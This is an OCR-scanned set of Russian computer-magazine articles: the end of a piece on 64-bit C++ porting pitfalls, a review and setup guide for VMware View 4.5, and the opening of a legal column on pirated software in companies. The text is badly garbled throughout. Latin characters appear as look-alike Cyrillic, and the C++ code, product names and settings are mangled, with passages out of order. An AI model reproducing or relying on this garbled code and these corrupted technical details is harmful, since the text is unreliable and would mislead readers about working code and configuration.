ѵігіиаі ѵоіЦ МпНеІр (ШОКИ сТлЮаСа, ІІШТ пСтсі) ; 

} 

Затем проектперекочевываетвѴізиа15і:исІіо2005, где прототип функции 
ѴѴіпНеІр в базовом классе СѴѴіпАрр изменился. Первый параметр метода 
теперь имееттип 0ѴѴ0РШ_РТВ, межтем как в дочернем классе он так и 
остался ОѴѴОРШ. 

ПРОБЛЕМА С ПРОТОТИПАМИ ФУНКЦИИ 

сіазз ШіпАрр 
{ 

/ / тип первого параметра изменился 

ѵігіиаі ѵоіЦ ѴІіпНеІр (ШОКБ_РТК ШБаіа, ІІШТ пСтсЦ ; 

} 

сіазз СЗатрІеАрр 
{ 

ѵігіиаі ѵоісі ШіпНеІр (ШОКБ ШБаіа, ІІШТ пСтсі) ; 

} 

Этот код будет прекрасно работать, будучи скомпилированным 
под 32-архитектуру, но если мы попробуем собрать программу для 
х64-системы, то получим странный эффект — две разные функции 
ѴѴіпНеІр. Связано это с тем, что в 64-битном кодинге тип ВѴѴОРО не 
равен типу 0ѴѴ0РВ_РТР, и компилятор в дочернем классе генерирует 
две копии одной и той же функции, а не перекрывает ее, как ожи- 
дается. 

Такой тип ошибок нельзя предвидеть заранее, ведь подобное недо- 
разумение может случиться не только при использовании классов 
МГС, но и вообще с любым кодом. Единственный способ избежать 
неприятностей — это внимательно анализировать код. 
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64-битный проект в Студии 



Перегруженные функции 

После виртуальных функций поговорим немного о перегружен- 
ных. Если в программе есть функция, перекрытая для 32-битных 
и 64-битных значений, то обращение к ней, например, с типом 
5І2е_і, будет транслироваться в различные вызовы. Примерно так: 

Перегруженные функции 

збабіс ѵоіб ЫитОбВібз (сопзб ипзідпе іпб32 &) 



РѴБ-БІисІіо — спецтулза для поиска ошибок в б4ЬК-коде 

64 р1гсШ_1: ровно в два раза больше старого-доброго іпі Таким 
образом, мало того, что мы будем получать из стека неправильные 
значения, так еще и организуем себе утечки памяти. Поэтому надо 
внимательнее относиться к перегруженным функциям, передавая 
им аргументы правильных типов. 

Константы 



{ 

ргіпбб ( "32 -битный параметр" ) ; 

} 

збабіс ѵоіб КГитОбВібз (сопзб ипзідпеб іпб64 &) 

{ 



} 



ргіпбб ( "64 -битный параметр" ) ; 



За много лет программирования под 32-битные платформы кодеры 
привыкли использовать константы, которые участвуют в операциях 
вычисления адреса, размера объектов или в битовых операциях. 
Эти константы могут сильно усложнить жизнь при переносе проек- 
та на х64-систему. Вот несколько примеров, которые прекрасно 
работают в х86-операционках, но приведут к плачевным результа- 
там на 64-битной машине. 



Код, собранный для х86-процессора, будет вызывать первую вер- 
сию функции, а для х64 — вторую. В некоторых ситуациях такое 
поведение может быть очень удобным. Но тут есть и свои опас- 
ности. Представим, что у нас есть класс, реализующий стек. Но 
не простой стек, а такой, который может хранить значения разных 
типов. Программист может написать код, который будет прекрасно 
работать в 32-битных системах, но при переходе на 64 бита все 
сломается. 

Класс стека и его неправильное использование 

сіазз МуЗбаск { 

риЫіс : 

ѵоіб РизП ( іпб3 2 &) ; 

ѵоіб РизП( іпб64 &) ; 

ѵоіб Рор ( Іпб32 &) ; 

ѵоіб Рор ( Іпб64 &) ; 

} 

МуЗбаск збаск; 

//в х64 системе кладем в стек 8 байт 

рбгбібб_б ѵаіиеі; 

збаск . РизЬ (ѵаіиеі ) ; 

/ / а достаем 4 ! ! ! 

іпб ѵа1ие2 ; 

збаск . Рор ( ѵа1ие2 ) ; 

Тут мы кладем в стек значение типа рІгсІТН:, а достаем уже іпі 
Под х86 величина этих типов одинакова, но в архитектуре Іпіеі 



Константы, которые ломают 64-битные программы 

// Пример 1 

зіге_б АггауЗіге = N * 4; 

іпбрбг_б *Аггау = (іпбрбг_б * ) шаііос (АггауЗіге) ; 

// Пример 2 

зіге_б ѵаіиез [АККАУ_ЗІ2Е] ; 

шешзеб ( ѵаіиез , О, АПКАУ_ЗІ2Е * 4) ; 

// Пример 3 

зіге_б п, г; 

п = п » (32 - г) ; 

Код первого примера выделяет память под массив указателей, 
считая, что размер каждого элемента массива равен 4 байтам. 
Все будет прекрасно работать под 32 битами, но вот в Іпіеі 64 
мы получим «оиІ оЪ теплоту». Во втором примере мы тоже счи- 
таем размер 5І2е_1: равным 4 байтам, но размерность этого типа 
зависит от количества бит в системе. Ну, а третий пример демон- 
стрирует ошибку, связанную с числом бит, содержащихся в 5І2е_і 
Исправить эти баги можно, внимательно проанализировав код и 
заменив подобные константы на зігеоШ и специальные значения 
из <Іітіб5,Ь>, <іпиуре5.1л> и т.д. 

Исправляем ошибки с размерностью 

// Пример 1 

зіге_б АггауЗіге = N * зігеоб (іпбрбг_б) ; 

іпбрбг_б *Аггау = (іпбрбг_б *) шаііос (АггауЗіге) ; 

// Пример 2 
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МісгозоН Ѵізиаі Біисііо 2010 отлично приспособлена для кодинга под 64 бита 



зІ 2 е_Ь ѵаіиез [АККАУ_ЗІ2Е] ; 

тегпзеб (ѵаіиез , О, АЕКАУ_ЗІ2Е * зігеоі ( зІ 2 е_Ь ) ) ; 

// Пример 3 
зІ 2 е_Ь п, г; 

п = п » (СНАЕ_ВІТ * зігеоі (п) - г) ; 

Еще один способ потратить долгие часы на отладку кода в 
64-битных системах — это использовать константу вида сопзі 
5І2е_1 М = ОхРРРРРРРОи. Обычный 32-битный кодер, записы- 
вая такое выражение, предполагает, что создает константу, 
все биты которой, кроме четырех последних, равны единице. 
К сожалению, под х64 значение М будет совсем другое — 
ОхООООООООРРРРРРРОи. Исправить это можно, используя либо 
#ібсІ еб, либо специальный макрос. 

Решаем проблему с константой ОхРРРРРРРОи 

#і!сІеі _ѴЕШ64 

#бе:Еіпе ССЖЗТ3264 (а) (а##і64) 

#е1зе 

Меііпе ССЖ8Т32 64 (а) (а) 

#еп(Ш: 

сопзб зІ 2 е_Ь М = -ССЖ8Т32 64 (ОхЕи) ; 

Очень часто в качестве кода ошибки или другого специального 
маркера используют значение -1. И практически всегда его запи- 
сывают как ОхРРРРРРРР. Но на 64-битных платформах это число 
вовсе не означает «минус единицу», и следующий пример это 
наглядно демонстрирует: 



Возвращаем кодошибки 

#сЗе^іпе ШѴАЫБ_КЕЗІІЕТ ( ОхЕЕЕЕЕЕЕЕи) 
зІ 2 е_Ь ЦзегЕЕгЬеп (сопзЬ сПаг *збг) 

{ 

ІЕ ( збг == ШШ) 

геЕигп 1№/АЫБ_КЕ311ЕТ; 

геЕигп г. ; 

} 

зіге_Е Іеп = ЦзегЗЕгЬеп ( зЕг) ; 

//в 64-битной системе обработка ошибки никогда не будет 
выполнена даже если ошибка действительно имела место 
іг (Іеп == (зІ 2 е_Ь) (-1) ) 

// обработка ошибки 

Тело Т выполнится только в 32-битной среде, а в х64 сравнение в 
условии оператора будет ложно. Если архитектура приложения не 
позволяет отказаться от использования кодов ошибок, то коррект- 
ная запись ІІ\ІѴАІ_Ю_РЕ51ІІ_Т, которая будет правильно работать и 
в 32-, и в 64-битном окружениях, будет выглядеть примерно так: 
#бебпе ІІ\ІѴАШ_РЕ51ИТ (зІ2е_і(-1 )). 

Заключение 

Конечно, это лишь краткий обзор типовых проблем при переходе с 
32-битной архитектуры на 64-битную. Но все описанные случаи осно- 
вываются на увеличении размерности некоторых типов, и поэтому 
после определенной тренировки такие ошибки будут отлавливаться и 
предотвращаться сами собой, надо лишь накопить немного опыта, ц-ц 



► ііб 
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Нереальные 

десктопы 

ѴМѵѵаге Ѵіеѵѵ 4.5: обзор возможностей популярного 
решения для виртуализации десктопов 

Мы все давно привыкли к традиционному подходу, когда на ПК пользователя устанавливаются 
все необходимые ему в работе программы. Но на самом деле такой подход не совсем 
оптимален. Админу без конца приходится решать задачи развертывания, обновления, 
лицензирования, безопасности, учета, бэкапа... Часть недешевых компьютеров простаивает, пока 
работник находится вне офиса. Виртуализация позволяет посмотреть на все это хозяйство под 
другим углом. 



Зачем нам ѴМѵѵаге Ѵіеѵѵ? 

В эпоху мейнфреймов все ПО находилось на мощном сервере, к кото- 
рому подключались пользователи для выполнения своих задач. Такой 
подход удобен во многих отношениях: требуется меньше лицензий 
на ПО, для работы подходят маломощные компьютеры (терминалы), 
ведь все вычисления производятся на сервере. Кроме того, снимается 
вопрос резервирования информации и наличия ПО на конкретном 
ПК, ведь все данные хранятся на сервере. В общем, рай для админа. 
Однако в сменившей эпоху мейнфреймов эпоху ПК об этой модели 
благополучно забыли. Практически взрывной рост количества 
компьютеров позволял неплохо зарабатывать как софтверным компа- 
ниям, так и разработчикам железа. К тому же пользователям понятна 
модель покупки и использования коробочного ПО. То есть его можно 
взять, принести и установить. Кто тягал коробки в бухгалтерию «для 
отчетности», тот поймет, о чем идет речь. Именно поэтому смерть 
коробок, которую предрекали еще со времени появления первых 
облачных сервисов, так и не наступила. Хотя нет, вру, облачные сер- 
висы (5аа5, Зойѵ/ѵаге аз а Зегѵісе) все же начали постепенно вытеснять 
некоторые настольные приложения; в качестве примера здесь хочет- 
ся привести популярные сегодня разработки Соо^іе: СМаіІ, Соо^іе 
Саіепйаг, Соо§1е Босз и другие. Иначе как объяснить возросшую 
популярность маломощных по сегодняшним меркам нетбуков? 
Теперь же компаниям предлагают целый спектр услуг на любые вкусы 
и запросы — почтовые, файловые серверы, антивирусное ПО и так 
далее. Главный плюс виртуального подхода — уменьшение времени 
развертывания и совокупной стоимости владения. Все ПО разме- 
щается на удаленном мощном сервере, а значит, фирме не нужно 
заботиться о покупке железа, его обслуживании, снижаются затраты 
организации на электроэнергию, обновление ПО также происходит 
автоматически, увеличивается жизненный цикл клиентских ПК. В 
сумме получается неплохая экономия (в два раза), которую не могли 
не заметить в кризис. А если добавить сюда повышение безопасности 
и управляемости рабочих мест? 

Но и этого показалось мало. Следующий вполне логичный шаг 
— инфраструктура виртуальных десктопов (ѴЛІ, Ѵігшаі Оезкшр 
Іпйгазігисщге) . Теперь пользователь вместо одного приложения по- 
лучает законченное виртуальное рабочее место (Пезкюр аз а Зегѵісе, 
ПааЗ) , которое настраивает полностью по своему вкусу и задачам. 
Подключаться к своему рабочему столу он может практически с 
любого устройства, подключенного в сеть, в том числе и с мобильного 
телефона. Админу такой подход сулит полный контроль за происхо- 
дящим, упрощает хранение данных, обновление и распределение 



лицензий ПО. То есть, фактически, админ в случае ѴПІ не ограничен в 
настройках и возможностях. Нужен новый рабочий стол — пожалуй- 
ста, одно движение мышкой — и пользователь может подключаться 
при помощи тонкого клиента, ноутбука или настольного ПК. 

Сразу напрашивается вопрос: «В чем различие между ѴЛІ и терми- 
нальными сервисами вроде М3 Кеішяе Пезкюр Зегѵісез (до ѴѴІп2к8К2 
М3 Тегтіпаі Зегѵісез) ?». Действительно, в обоих случаях данные хра- 
нятся и выполняются на удаленном сервере, а пользователь получает 
рабочий стол по сети. Внешне ѴЕ)І и ТЗ/КХ)5 выглядят одинаково, но 
отличия есть. Так, в случае с ТЗ/РФЗ, мы получаем быстрое разверты- 
вание, но привязаны к единой ОС и приложениям, которые установ- 
лены в системе. Приложения не изолированы друг от друга, и если 
их много, использование Т5 становится неудобным. И главное — в 
таком случае очень сложно контролировать ресурсы. В случае выбора 
ѴБІ мы каждому пользователю предоставляем любой набор ОС и 
приложений, причем он сам может выбирать то, что ему действитель- 
но необходимо. Появление вирусов или сбоя приложения на одном из 
десктопов никак не отразится на работе других. Забегая чуть вперед, 
скажу, что использование «Ѵіеѵѵ СНеш ѵѵігіі Ьосаі Мойе» дает возмож- 
ность загрузить рабочий стол на ПК и работать как ни в чем не бывало 
даже в случае недоступности ѴЛІ-сервера. 

Минусы ѴЛІ очевидны — необходимо иметь достаточно ресурсов на 
сервере, чтобы запустить несколько десятков копий ОС с приложения- 
ми. Также стоит отметить, что никто не считает ѴЛІ панацеей и тем 
более заменой Т5, поскольку это — скорее дополняющие друг друга 
технологии. 

Знакомимся с ѴМѵѵаге Ѵіеѵѵ 4 

Компания ѴМѵѵаге широко известна своими продуктами виртуа- 
лизации, одно из центральных мест среди предлагаемых решений 
занимает ѴМѵѵаге Ѵіеѵѵ (ѵтѵѵаге.сот/ргосІисЕз /ѵіеѵѵ) , обеспечиваю- 
щее виртуализацию рабочих столов. Первые версии Ѵіеѵѵ называ- 
лись ѴМѵѵаге ѴЛІ, затем, начиная с релиза 3.0, имя было заменено 
на ѴМѵѵаге Ѵіеѵѵ. Для новой технологии был специально разработан 
новый протокол удаленного доступа РСоІР (РС-оѵег-ІР), который 
способен адаптироваться к особенностям сетевого подключения и 
возможностям компьютера клиента, выбирая оптимальные парамет- 
ры для работы. Протокол обеспечивает передачу НП-изображения, 
доступ к ІІ5В-устройствам, выход в ЬАЫ и ѴѴАЛ. Весь трафик сжимает- 
ся и зашифровывается, экономия трафика достигается также за счет 
того, что клиенту передаются лишь изменения в пикселях, а не весь 
рабочий стол. К слову, помимо софтовых версий сегодня доступны и 
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аппаратные реализации РСоІР. Кроме РСоІР клиенты ѴМѵѵаге Ѵіеѵѵ 
могут подключаться к удаленным системам (не только виртуальным) 
при помощи протоколов КЕ)Р и НР КС5 (Кетозе СгарЫсз Зойѵѵаге) . 
Основой Ѵіеѵѵ является платформа виртуализации ѴМѵѵаге ѵЗрйеге/ 
Е5Х о которой мы уже говорили в августовском номере ] [. Функ- 
ционал Ѵіеѵѵ состоит из нескольких компонентов. Компонент Ѵіеѵѵ 
Мапа^ег управляет всей инфраструктурой и выступает в роли ме- 
неджера соединений, обеспечивая аутентификацию пользователей 
и подключение кѴМ. Причем он может работать в двух вариантах 
— Ѵіеѵѵ Соппесйоп Зегѵег и Зесигку Зегѵег. Первый — обязательный 
компонент, который, собственно, и производит аутентификацию 
пользователей (данные сохраняются в локальной ІЮАР-базе) и выбор 
виртуального десктопа. Затем клиент подключается к своему рабоче- 
му столу напрямую (с использованием шифрования или без) . Во вто- 
ром случае сервер устанавливается в ПМ2 и является посредником, 
гарантирующим, что данные, текущие по \ѴАЫ, будут зашифрованы. 
Поддержку работы с несколькими мониторами обеспечивает функ- 
ция ѴМѵѵаге Ѵіеѵѵ Бізріау, оптимизирующая разрешение и управление 
экранами. Благодаря ѴМѵѵагеѴіеѵѵ Пігесі: пользователь может без 
проблем подключаться к локальным ИЗВ-девайсам. Поддержку печа- 
ти обеспечивает ѴМѵѵаге Ѵіеѵѵ Ргіпйп§, который не требует установки 
драйверов и отлично работает на медленных каналах. И, наконец, 
ШШеб Ассезз обеспечивает единый (550) доступ при подключении 
кдругим системам. Использование Ѵіеѵѵ Сотрозег дает возможность 
экономить дисковое пространство и создавать виртуальные ПК на 
базе одного клона. Применение ѴМѵѵаге ТЫпАрр позволяет виртуа- 
лизировать приложения, запаковывая их в контейнеры, которые 
распространяются среди пользователей. Балансировка нагрузки 
серверов Ѵіеѵѵ Соппесйоп Зегѵег обеспечивается за счет их объедине- 
ния в ЖВ-ферму средствами ѴѴіпбоѵѵБ. 

На тонкий клиент или клиентскую систему устанавливается Ѵіеѵѵ 
СИепі, обеспечивающий доступ к рабочим станциям. Предлагается 
две версии — обычная и «ѵѵігіі Іосаітосіе»; последняя позволяет выгру- 
жать виртуальные машины на локальный компьютер для работы без 
соединения с Ѵіеѵѵ Мапа^ег. С целью создания возможности управ- 
ления при помощи Ѵіеѵѵ Мапа^ег, аутентификации на ѴМ, ПК, Т5 и 
т.д. устанавливается Ѵіеѵѵ А§епй Агент и клиент доступны под 32- и 
64-битные версии ѴѴІпбоѵѵз, клиент, кроме того — и для Мае 05 X. 
Также хочется обратить внимание на отдельный проект ѴМѵѵаге Ѵіеѵѵ 



Ореп СИеШ: (собе. ^оо^іе. сот/р /ѵтѵѵаге-ѵіеѵѵ-ореп-сІіепО , позволяю- 
щий подключаться к удаленным ѴѴІпбоѵѵз-системам и пользователям 
ѴМѵѵагеѴіеѵѵ, работающим в Біпих и Мае 05 X. Распространяется Ореп 
СНеЩ на условиях БОРЬ ѵ 2 . 1 . Кроме того пользователи могут полу- 
чить доступ к виртуальным системам через веб-браузер (Ѵіеѵѵ Ронаі) . 
Управление всеми настройками осуществляется посредством весьма 
удобной веб-консоли управления Ѵіеѵѵ АбтітзйгаШг, Ѵіеѵѵ РоѵѵегСБІ 
командлетов РоѵѵегЗйеІІ или утилиты ѵбтабтіп. 

В начале сентября анонсирована новая версия 4.5, которая получила 
множество новых функций. В частности, она обеспечивает поддержку 
виртуальных ПК ѴѴІп7, подключение Мае 05 X, упрощенное админис- 
трирование за счет использования ролей, интеграции 5С0М (ЗузЩт 
Сепгег Орегагіопз Мапа^ег), поддержки РоѵѵегЗЬеІІ и многое другое. 
Полный список всех новинок можно посмотреть на сайте. 

Для тех, кто любит цифры, ѴМѵѵаге предлагает калькулятор КОІ 
(Кешгп оп ІпѵезйпепО позволяющий подсчитать доход от приобрете- 
ния ѴМѵѵаге Ѵіеѵѵ Ггоцсо.ѵтѵѵаге.сот/ѵшѵѵ) . Предлагается ѴМѵѵаге 
Ѵіеѵѵ в двух редакциях — Ешегргізе и Ргетіег, с двумя вариантами 
— Випбіе и Абб-Оп. Конкретная стоимость высчитывается в зависи- 
мости от выбранной редакции, варианта и количества подключений. 
Причем последние не вбиты в лицензию, их превышение никак не 
контролируется. 

Устанавливаем ѴМѵѵаге Ѵіеѵѵ 

После регистрации на сайте ѴМѵѵаге мы получаем доступ к закачке 
продуктов, входящих в состав ѴМѵѵаге Ѵіеѵѵ (на почту после подтверж- 
дения ящика придут ключи) . Скачиваем все необходимые компо- 
ненты, выбирая в том числе и разрядность ОС. Список совместимых 
устройств и ОС можно найти в «Нагбѵѵаге СотрайЬіІіГу Сиібе» 
(ѵтѵѵаге.сот/гезоигсез/^иібез.ЬйнІ) . Здесь в первую очередь необхо- 
димо ориентироваться на требования Е5Х/Е5ХІ, которые будут нести 
основную нагрузку. 

Для развертывания системы ѴМѵѵаге Ѵіеѵѵ нам понадобятся рабо- 
тающие сервера ѴМѵѵаге ѵЗрйеге Е5Х/Е5ХІ Зегѵег и установленный 
ѵСеЩег (читай статью в августовском номере) . Также необходимо 
наличие службы Асйѵе ПігесШгу, которое используется для аутенти- 
фикации пользователей и управления политиками. Причем для Ѵіеѵѵ 
лучше создать отдельную 011, это на порядок упростит настройки и 
применение СРО в будущем. Для получения ІР-адреса и разрешения 
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имен понадобятся настроенные службы ЭНСР и БЫЗ. Для установки 
собственно компонентов ѴМѵѵаге Ѵіеѵѵ нам понадобится сервер х86 
ѴѴІп2к35Р2 или х86/х64 ѴѴІп2к8К2, запущенный на физической или 
виртуальной машине. Минимально необходимыми требованиями 
объявлены 2 Гц СРИ и 2 Гб ВАМ. Естественно, для комфортной работы 
они должны быть как минимум в два раза выше. Теперь рассмотрим 
установку основных компонентов, входящих в состав Ѵіеѵѵ. Начнем 
с Ѵіеѵѵ Сотрозгег. Здесь все просто. Запускаем инсталляционный 
файл, мастер проверит наличие всех необходимых компонентов 
(для ѴѴІп2кЗ нужен М3 Егатеѵѵогк 3.0) . На странице ОаГаЪазе 
Іпіогтагіоп задаем имя сервера, в котором будут храниться данные. 
Кнопка СЮВ5 ОЗЫ ЗеШр поможет настроить нужные параметры. В 
качестве ЗС^Ь-сервера Ѵіеѵѵ допускает использование удаленного 
или локального М3 5<ЗЬ Зегѵег 2к5/2к8, в том числе поддерживает- 
ся и Ехргезз Ейігіоп (подходит для небольших сред до 50 ѴМ) или 
Огасіе. Заранее должна быть создана нужная база данных и заданы 
необходимые права доступа. Для настроек Ехргезз Есіііііоп удобнее 
использовать бесплатную среду администрирования Місгозой ЗС^Ь 
Зегѵег Мапа^етегп Зшйіо Ехргезз (55М5Е), которую можно скачать 
по ссылке на сайте М3. По окончанию задаем номер порта, на кото- 
ром будет принимать подключения Сотрозег (по умолчанию 8443) . 
Приступаем к установке Ѵіеѵѵ Соппесйоп Зегѵег. Несущий его компью- 
тер не должен иметь других ролей, в частности, не быть контроллером 
домена и сервером терминалов. Сетевой ІР-адрес устанавливается 
статически. Первые шаги мастера стандартные — каталог, лицензия 
и т.д. На шаге Іпзгаііайоп Орйопз необходимо определить тип сервера. 
Возможен выбор одного из четырех вариантов: 

• Ѵіеѵѵ Зіагйагі Зегѵег — стандартная полная установка на отдельный 
сервер или первая установка на группе серверов; 

• Ѵіеѵѵ Керііса Зегѵег — второй и последующий сервер репликации в 
группе; настройки ІЮАР будут скопированы с основного сервера; 

• Ѵіеѵѵ Зесигігу Зегѵег — установка компонентов защиты; такой 
сервер обычно размещается в ПМ2 и разделяет интернет и ІАИ, через 
него клиенты подключаются к серверам Ѵіеѵѵ внутри сети, он необя- 
зательно должен быть членом домена; 

• Ѵіеѵѵ Тгапзіег Зегѵег — необходим для Ьосаі Мойе. 

Мастер проверит, является ли компьютер членом домена и предложит 
сконфигурировать ѴѴтйоѵѵз Рігеѵѵаіі в автоматическом режиме. Если 
тебе этот вариант не подходит, то выбирай «По пог сопй^иге ѴѴтйоѵѵз 
Рігеѵѵаіі», но не забудь после установки разрешить подключения на 
80, 443, 4001, 4100 и 8009 порты. Все, жмем Іпзгаіі и ждем окончания 
процесса установки. Установка ѴС5 в других вариантах будет чуть 
отличаться, но ничего сложного там нет. 



Интерфейс Ѵіеѵѵ Айтіпізігаіог 

Веб-консоль Ѵіеѵѵ Айтіпізггаюг позволяет управлять настройками 
одного или группы серверов. Для его запуска выбираем одноименный 
ярлык в меню или на рабочем столе или просто набираем в браузере 
йнрз://5егѵег/айтіп. Официально поддерживаются веб-браузеры ІЕ 
6/7 и ГР 3. 0/3. 5, с плагином АйоЪе Еіазіі Ріауег 10, с другими возмож- 
ны проблемы. Кстати, при работе с не-ѴѴІп-системами потребуются 
шрифты от М3. Для входа используем логин и пароль учетной записи с 
правами Потаіп Айтіпз и указываем домен, к которому производит- 
ся подключение. При входе игнорируем предупреждение об ошибке 
сертификата, при наличии центра сертификации сертификат можно 
заменить позже. 

Интерфейс Ѵіеѵѵ Айтіпізггагог можно назвать очень простым и, хотя 
он не переведен на русский язык, разобраться с его настройками 
сможет любой владеющий базовым английским админ. Визуально 
окно разбито на три части. Слева вверху находится панель событий, в 
которой отображается количество сессий (локальных и удаленных), 
проблемных десктопов и прочие данные. Чуть ниже находится основ- 
ное меню, состоящее из шести пунктов: ПазЫэоагй, ІІзегз апй Сгоирз, 
Іпѵепгогу, Мониторинг, Роіісіез и Ѵіеѵѵ Сопй^игагіоп. Последние 
четыре имеют по несколько подпунктов. Поддерживаются фильтры, 
сортировка и поиск, поэтому при большом количестве управляемых 
объектов работать с ѴА очень просто. 

Первым делом после установки необходимо ввести лицензию. Пере- 
ходим в Ѵіеѵѵ Сопй^игагіоп РгойисШсепзіп^ апй Ііза^е, нажимаем 
Ейп Ьісепзе и в появившемся окне вводим номер, полученный на 
сайте ѴМѵѵаге. 

После установки пользователи, имеющие права администратора, 
будут включены в группу ВШЬТШХАйтшзГгаГог. При необходи- 
мости можно изменить их список и установить права в окне «Ѵіеѵѵ 
Сопй^игайоп Айтіпізггагогз». Выбираем «Асій Іізег апй Сгоир», 
задаем домен и шаблон поиска. Затем отбираем нужные учетные 
записи. Особо следует отметить контроль доступа на основе ролей и 
привилегий, применяемый в Ѵіеѵѵ, позволяющий тонко настроить 
права администраторов и пользователей. 

Добавляем остальные сервера Ѵіеѵѵ и ѵСепГег, для чего переходим в 
меню «Ѵіеѵѵ Сопй^игагіоп Зегѵегз». Нажимаем Асій и вводим имя 
или ІР сервера и учетные данные для подключения. Если на сервере 
установлен Ѵіеѵѵ Сотрозег, отмечаем флажок ЕпаЫе Ѵіеѵѵ Сотрозег. 
Чтобы вновь создаваемые виртуальные рабочие станции автомати- 
чески добавлялись к домену, следует в окне Потаіпз нажать кнопку 
Айй, указать имя домена, к которому будут подключены рабочие 
столы, и учетную запись с правами админа. Все, подтверждаем 
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изменения — если все введено правильно, сервер ѵСеглег 
появится в окне Ѵіеѵѵ Айтіпізггашг. Кнопка Ейп позволит 
указать или изменить ряд параметров: использование 
ЗЗЬ клиентами в разных режимах, ІЖЬ для подключения, 
аутентификация при помощи смарт-карт, бэкап и другие. 
Глобальные установки (таймаут сеанса, ЗЗЬ, сообщения 
при регистрации и отключении) производятся в пункте 
«Ѵіеѵѵ Сопй^игайоп СІоЪаІ 5етп§». 

Подключаем системы 

О развертывании виртуальных машин рассказано в 
статье о ѵЗрйеге, поэтому здесь подробности этого этапа 
пропускаем и идем дальше. Итак, создаем новую ѴМ, 
ставим гостевую ОС и ѴМѵѵаге Тооіз. Чтобы получить воз- 
можность управлять виртуальными десктопами, следует 
установить на них Ѵіеѵѵ А^егп, в этом случае мы получаем 
максимум возможностей. В процессе установки агента бу- 
дут запрошены данные сервера, к которому производится 
подключение. Именно таким образом подключаются 
другие системы, не управляемые ѵСегЛег (физические, 
ѴМ, терминальные сервисы) . Управление ѴЕ) производит- 
ся во вкладке «Іпѵеглогу». Виртуальные рабочие станции 
могут создаваться в одном из трех пулов: 

• Ашотаіесі Рооі — автоматически из шаблонов ѵСегЛег, 
по мере необходимости без участия админа; 

• Мапиаі Рооі — рабочие станции, создаваемые вручную 
из шаблона, сюда обычно включают все системы, не 
управляемые ѵСегЛег; 
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Устанавливаем лицензию 
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• О ѴМѵѵаге ѵЗрЬеге 
читай в статье «Вир- 
туальная сфера» 
в номере ][ за август 
2010 года. 
•Основными кон- 
курентами ѴМѵѵа ге 
Ѵіеѵѵ являются Сіігіх 
ХепБезкіор, Зузіапсіа 
АррІГОіз Ризіоп, 
Егісот РоѵѵегТегт 
ѴѴеЬСоппесі, Огасіе 
Ш. 
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Подключаемся к Ѵіеѵѵ Соппесііоп во время установки агента 



• Тегтіпаі Зегѵісез Рооі — терминальные серверы 

МІСГ050Й. 

После установки агентов на ѴМ открываем вкладку Рооіз, 
нажатием Асій запускаем мастер создания нового пула. 

Далее выбираем тип пула, вводим уникальный иден- 
тификатор Рооі ГО. На этапе 8ешп§ следует установить 
параметры подключения: протокол, время 1о§оіТ, подде- 
ржка АйоЪе РІазЬ. По умолчанию подключение произ- 
водится с любого Соппесйоп Зегѵег; выбрав Соппесйопз 
Зегѵег Кезггісйопз, можно, при помощи тегов, указать на 
конкретные сервера. Далее отбираем в списке системы, 
которые включаются в пул. После добавления десктопы 
появятся в соответствующей вкладке в ПезкФрз. 

Заключение 

Нужно отметить, что ѴМѵѵаге Ѵіеѵѵ — это сложный по 
устройству, но простой в управлении продукт. Большинс- 
тво настроек интуитивны и не требуют обращения к 
документации. Хотя почитать доки все равно стоит. Ведь 
они — рѵлез! ~ц~ 
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Контрафактное 

ПО на предприятии 

Как прикрыть свою пятую точку? 

Примерно половина сисадминов, обратившихся за юридической помощью, ставят своим 
советчикам нереальные задачи. «Как сделать так, чтобы меня не наказали за контрафакт? 
Помогите мне, но учтите, что начальство денег на покупку лицензий не дает, а ссориться с 
начальством нельзя...». 



Профессия риска 

Наибольшие потери поголовье сисадминов несет от хищников в по- 
гонах. Нет, речь идет не о призыве на военную службу, а об уголовной 
ответственности за нарушение авторских прав. При обращении с 
цифровым контентом нарушение происходит очень быстро, легко, 
дешево и незаметно — также, как копирование файла. Собственно, 
в копировании оно и заключается. Нет другого такого преступления, 
для совершения которого прилагается столь мало усилий (кроме 
оскорбления Царствующей Особы, но в России такой статьи в УК пока 
нет) . Кликнул мышью, нажал кнопку — и вот вам, пожалуйста: статья 
146 УК в полный рост. 

Кровавая борьба за мир 

Криминологи России отмечают удивительный феномен, имеющий 
место ровно с тех пор, как в 2007 году статья 146 УК (нарушение 
авторских прав) была переведена в разряд тяжких преступлений. 
Демографический портрет среднего «преступника», осужденного по 
146-й, совсем не похож на портрет преступника. Ни тебе тяжелой на- 
следственности, ни диких обычаев, ни прошлых судимостей, ни алко- 
голизма. Типичный нарушитель авторских прав — законопослушный 
гражданин с высшим образованием, из порядочной семьи, с хорошим 
здоровьем, с профессией, «не был, не состоял, не привлекался»... 
Такого быть не должно. Криминальный элемент обязан статистичес- 
ки отличаться от среднего гражданина — опоры общества. И он-таки 
отличается. По всем преступлениям, кроме нарушения авторских 
прав. Разрешить эту загадку криминалисты не могут (а тот, кто смо- 
жет, немедленно вылетит со службы за экстремизм и клевету) . Но для 
нас важны не причины, а следствие. Следствие же таково: попасть под 
следствие (по 146-й) имеет шанс любой из нас, честный, законопос- 
лушный, образованный представитель среднего класса. 

Кто может читать законы? 

Существует распространенная легенда о том, что законы пишутся 
для людей. В том смысле, что прочесть и понять текст может каждый 
человек со средним образованием. Возможно, во времена Хаммурапи 



действительно было так. Но с тех пор обстоятельства сильно измени- 
лись. Появилась отдельная профессия — юрист. Пять лет на юрфаке 
студентов учат читать нормативные акты. Применять прочитанное 
на практике выпускники обучаются уже потом, поступив на службу. 

А первые пять лет — только читать; за «понимание» им добавляют на 
экзамене лишний балл. 

Многих вводит в заблуждение тот факт, что законы написаны, вроде 
бы, на русском языке. Все буквы знакомые, каждое слово в отдельнос- 
ти понятно. Но из этих двух фактов делается совершенно нелогичный 
вывод... Один мой знакомый юрист, впервые в жизни увидев исходник 
на языке С, заявил, что ничего сложного тут нет, слова все английские, 
математические знаки понятны, и что он сейчас разберется и добавит 
в программу новую функцию. От того, чтобы стать великим програм- 
мистом за пять минут, этого гуманитария удержал компилятор: ни 
за что не желал компилировать, пока не будут исправлены ошибки. 
Аналогичные претензии технаря на владение Гражданским кодексом, 
к сожалению, обломать некому. Суд в качестве верификатора знаний 
— это слишком долго, дорого и необъективно. Всегда хочется думать, 
что не сам ошибся, а судья предвзято настроен (такое, конечно, тоже 
бывает) . 

Тем не менее, автор настаивает на приведенной аналогии, посколь- 
ку по счастливой случайности владеет знаниями в обеих областях 
одновременно. Уморителен вид айтишника, который, прочитав пару 
законов, решил, что ему все понятно, и что с этим самым пониманием 
он теперь может смело выступать на форумах или в ЖЖ. А сам лицен- 
зиата от лицензиара не отличает. 

Да, в идеальном государстве законы писаны так, чтобы каждый мог их 
